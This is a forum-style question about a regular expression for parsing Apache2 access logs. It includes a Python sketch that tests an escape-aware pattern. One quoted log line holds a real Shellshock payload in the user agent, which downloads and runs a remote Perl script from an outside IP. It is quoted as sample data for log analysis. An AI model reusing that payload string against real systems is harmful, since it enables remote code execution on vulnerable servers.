I want to parse Apache2 log files and found an otherwise good regexp here for doing so:
/^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] \"(\S+) (.*?) (\S+)\" (\S+) (\S+) "([^"]*)" "([^"]*)"$/
The problem is that this regexp predates the Shellshock attack bots, and it returns no match against a log line whose user agent string looks like the one below.
Example of a bash attack line that fails to match:
199.217.117.211 - - [18/Jan/2015:04:51:19 -0500] "GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""
Here is a regular log line:
157.55.39.0 - - [18/Jan/2015:09:32:37 -0500] "GET / HTTP/1.1" 200 37966 "-" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
Can someone provide an updated regexp that handles hacked user agent strings like this one, or suggest an alternative two-step PHP plus regexp approach that is more hack-proof? I can see that the specific problem is the escaped quotes (\") inside the user agent, which the final group "([^"]*)" cannot match. It appears the last part of the regexp could be replaced with "(.*)"$, but I'd like an expert opinion. Thanks.
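To make the failure concrete, here is a minimal sketch that reproduces it with the two log lines above. It is written in Python only for quick testing; the pattern syntax is plain enough that it should carry over to PHP's preg_match, but I have not verified that. The names ORIGINAL, ESCAPE_AWARE, QUOTED, PREFIX, ATTACK and REGULAR are just illustrative. The escape-aware quoted group is one possible alternative to "(.*)"$, not a vetted fix.

```python
import re

# Shared prefix of the pattern, up to and including the byte count.
PREFIX = (
    r'^(\S+) (\S+) (\S+) \[([^:]+):(\d+:\d+:\d+) ([^\]]+)\] '
    r'"(\S+) (.*?) (\S+)" (\S+) (\S+) '
)

# The pattern from the question: quoted fields may not contain any '"'.
ORIGINAL = re.compile(PREFIX + r'"([^"]*)" "([^"]*)"$')

# Assumed alternative: a quoted field is a run of either
# non-quote/non-backslash characters or backslash-escaped characters.
QUOTED = r'"((?:[^"\\]|\\.)*)"'
ESCAPE_AWARE = re.compile(PREFIX + QUOTED + ' ' + QUOTED + '$')

ATTACK = (
    r'199.217.117.211 - - [18/Jan/2015:04:51:19 -0500] '
    r'"GET /cgi-bin/help.cgi HTTP/1.0" 404 498 "-" '
    r'"() { :;}; /bin/bash -c \"cd /tmp;wget http://185.28.190.69/mc;'
    r'curl -O http://185.28.190.69/mc;perl mc;perl /tmp/mc\""'
)
REGULAR = (
    '157.55.39.0 - - [18/Jan/2015:09:32:37 -0500] "GET / HTTP/1.1" '
    '200 37966 "-" "Mozilla/5.0 (compatible; bingbot/2.0; '
    '+http://www.bing.com/bingbot.htm)"'
)

if __name__ == "__main__":
    for name, line in (("attack", ATTACK), ("regular", REGULAR)):
        old = ORIGINAL.match(line)
        new = ESCAPE_AWARE.match(line)
        print(name, "original matches:", old is not None)
        print(name, "escape-aware matches:", new is not None)
        if new:
            # Group 13 is the user agent, escaped quotes included.
            print(name, "user agent:", new.group(13))
```

The captured user agent still contains the backslash-escaped quotes, so whatever consumes it afterwards should treat it as untrusted text.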